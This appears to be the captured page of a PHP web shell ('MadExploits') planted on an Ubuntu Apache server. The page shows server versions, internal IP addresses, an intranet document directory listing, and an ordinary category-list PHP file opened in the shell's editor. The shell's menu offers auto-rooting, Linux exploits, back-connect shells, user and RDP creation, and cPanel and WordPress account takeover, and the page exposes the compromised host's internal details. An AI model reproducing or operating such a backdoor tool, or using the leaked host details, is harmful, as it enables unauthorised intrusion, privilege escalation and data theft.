Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
intranetpage /
iiitdinternaldocs /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-x--x
dist
[ DIR ]
drwxr-x--x
documents
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
plugins
[ DIR ]
drwxr-x--x
DBController.php
739
B
-rwxr-x--x
categorylist.php
2.25
KB
-rwxr-x--x
common.php
2.94
KB
-rwxr-x--x
createCategory.php
3.45
KB
-rwxr-x--x
createOfficeorder.php
9.13
KB
-rwxr-x--x
dashboard.php
3.01
KB
-rwxr-x--x
dbconfig.php
1.25
KB
-rwxr-x--x
get_subcatg.php
500
B
-rwxr-x--x
index.php
3.54
KB
-rwxr-x--x
indexDashboard.php
9.81
KB
-rwxr-x--x
list.php
9.5
KB
-rwxr-x--x
list.php_07032021
10.86
KB
-rwxr-x--x
logout.php
377
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : categorylist.php
<?php error_reporting(0); ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require_once 'common.php'; $officeOrder = new IIITDELHI(); require_once("DBController.php"); $db_handle = new DBController(); $query = "SELECT * FROM category"; $categoryResult = $db_handle->runQuery($query); ?> <script src="https://code.jquery.com/jquery-2.1.1.min.js" type="text/javascript"></script> <?php require PATH_LIB . "page-top.php"; ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <section class="content"> <div class="container-fluid"> <div class="row"> <div class="col-12"> <div class="card"> <div class="card-header"> <h3 class="card-title">Categories List</h3> </div> <!-- /.card-header --> <div class="card-body"> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th>Category</th> </tr> </thead> <tbody> <?php $result = $DB_con->prepare("SELECT * FROM category "); $result->execute(); for($i=0; $row = $result->fetch(); $i++){ ?> <tr> <td><?php echo $row ['categoryName']; ?></td> </tr> <?php } ?> </tbody> </table> </div> <!-- /.card-body --> </div> <!-- /.card --> </div> <!-- /.col --> </div> <!-- /.row --> </div> <!-- /.container-fluid --> </section> <a id="back-to-top" href="#" class="btn btn-primary back-to-top" role="button" aria-label="Scroll to top"> <i class="fas fa-chevron-up"></i> </a> </div> <script> var input3 = document.getElementById('fileUpload'); var infoArea3 = document.getElementById('fileUploadfilename'); input3.addEventListener('change', showFileName3); function showFileName3(event) { // the change event gives us the input it occurred in var input3 = event.srcElement; // the input has an array of files in the `files` property, each one has a name that you can use. We're just using the name here. var fileName3 = input3.files[0].name; // use fileName however fits your app best, i.e. add it into a div infoArea3.textContent = 'File name: ' + fileName3; } </script> <!-- /.content-wrapper --> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close